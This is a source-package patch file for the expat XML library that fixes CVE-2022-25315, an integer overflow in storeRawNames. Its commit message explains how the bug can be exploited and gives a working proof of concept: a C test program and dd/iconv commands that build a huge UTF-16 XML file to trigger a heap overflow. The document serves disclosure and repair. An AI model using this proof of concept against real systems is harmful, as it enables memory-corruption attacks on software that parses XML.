expat: import patches for CVEs
[feed/packages.git] / libs / expat / patches / CVE-2022-25315.patch
1 Patch-Source: https://github.com/libexpat/libexpat/commit/89214940efd13e3b83fa078fd70eb4dbdc04c4a5
2 From eb0362808b4f9f1e2345a0cf203b8cc196d776d9 Mon Sep 17 00:00:00 2001
3 From: Samanta Navarro <ferivoz@riseup.net>
4 Date: Tue, 15 Feb 2022 11:55:46 +0000
5 Subject: [PATCH] Prevent integer overflow in storeRawNames
6
7 It is possible to use an integer overflow in storeRawNames for out of
8 boundary heap writes. Default configuration is affected. If compiled
9 with XML_UNICODE then the attack does not work. Compiling with
10 -fsanitize=address confirms the following proof of concept.
11
12 The problem can be exploited by abusing the m_buffer expansion logic.
13 Even though the initial size of m_buffer is a power of two, eventually
14 it can end up a little bit lower, thus allowing allocations very close
15 to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag
16 names can be parsed which are almost INT_MAX in size.
17
18 Unfortunately (from an attacker point of view) INT_MAX/2 is also a
19 limitation in string pools. Having a tag name of INT_MAX/2 characters
20 or more is not possible.
21
22 Expat can convert between different encodings. UTF-16 documents which
23 contain only ASCII representable characters are twice as large as their
24 ASCII encoded counter-parts.
25
26 The proof of concept works by taking these three considerations into
27 account:
28
29 1. Move the m_buffer size slightly below a power of two by having a
30 short root node <a>. This allows the m_buffer to grow very close
31 to INT_MAX.
32 2. The string pooling forbids tag names longer than or equal to
33 INT_MAX/2, so keep the attack tag name smaller than that.
34 3. To be able to still overflow INT_MAX even though the name is
35 limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag
36 which only contains ASCII characters. UTF-16 always stores two
37 bytes per character while the tag name is converted to using only
38 one. Our attack node byte count must be a bit higher than
39 2/3 INT_MAX so the converted tag name is around INT_MAX/3 which
40 in sum can overflow INT_MAX.
41
42 Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes
43 without running into INT_MAX boundary check. The string pooling is
44 able to store INT_MAX/3 as tag name because the amount is below
45 INT_MAX/2 limitation. And creating the sum of both eventually overflows
46 in storeRawNames.
47
48 Proof of Concept:
49
50 1. Compile expat with -fsanitize=address.
51
52 2. Create Proof of Concept binary which iterates through input
53 file 16 MB at once for better performance and easier integer
54 calculations:
55
56 ```
57 cat > poc.c << EOF
58 #include <err.h>
59 #include <expat.h>
60 #include <stdlib.h>
61 #include <stdio.h>
62
63 #define CHUNK (16 * 1024 * 1024)
64 int main(int argc, char *argv[]) {
65 XML_Parser parser;
66 FILE *fp;
67 char *buf;
68 int i;
69
70 if (argc != 2)
71 errx(1, "usage: poc file.xml");
72 if ((parser = XML_ParserCreate(NULL)) == NULL)
73 errx(1, "failed to create expat parser");
74 if ((fp = fopen(argv[1], "r")) == NULL) {
75 XML_ParserFree(parser);
76 err(1, "failed to open file");
77 }
78 if ((buf = malloc(CHUNK)) == NULL) {
79 fclose(fp);
80 XML_ParserFree(parser);
81 err(1, "failed to allocate buffer");
82 }
83 i = 0;
84 while (fread(buf, CHUNK, 1, fp) == 1) {
85 printf("iteration %d: XML_Parse returns %d\n", ++i,
86 XML_Parse(parser, buf, CHUNK, XML_FALSE));
87 }
88 free(buf);
89 fclose(fp);
90 XML_ParserFree(parser);
91 return 0;
92 }
93 EOF
94 gcc -fsanitize=address -lexpat -o poc poc.c
95 ```
96
97 3. Construct specially prepared UTF-16 XML file:
98
99 ```
100 dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml
101 echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml
102 echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368
103 iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml
104 ```
105
106 4. Run proof of concept:
107
108 ```
109 ./poc poc-utf16.xml
110 ```
111 ---
112 expat/lib/xmlparse.c | 7 ++++++-
113 1 file changed, 6 insertions(+), 1 deletion(-)
114
115 --- a/lib/xmlparse.c
116 +++ b/lib/xmlparse.c
117 @@ -2424,6 +2424,7 @@ storeRawNames(XML_Parser parser) {
118 while (tag) {
119 int bufSize;
120 int nameLen = sizeof(XML_Char) * (tag->name.strLen + 1);
121 + size_t rawNameLen;
122 char *rawNameBuf = tag->buf + nameLen;
123 /* Stop if already stored. Since m_tagStack is a stack, we can stop
124 at the first entry that has already been copied; everything
125 @@ -2435,7 +2436,11 @@ storeRawNames(XML_Parser parser) {
126 /* For re-use purposes we need to ensure that the
127 size of tag->buf is a multiple of sizeof(XML_Char).
128 */
129 - bufSize = nameLen + ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
130 + rawNameLen = ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
131 + /* Detect and prevent integer overflow. */
132 + if (rawNameLen > (size_t)INT_MAX - nameLen)
133 + return XML_FALSE;
134 + bufSize = nameLen + (int)rawNameLen;
135 if (bufSize > tag->bufEnd - tag->buf) {
136 char *temp = (char *)REALLOC(parser, tag->buf, bufSize);
137 if (temp == NULL)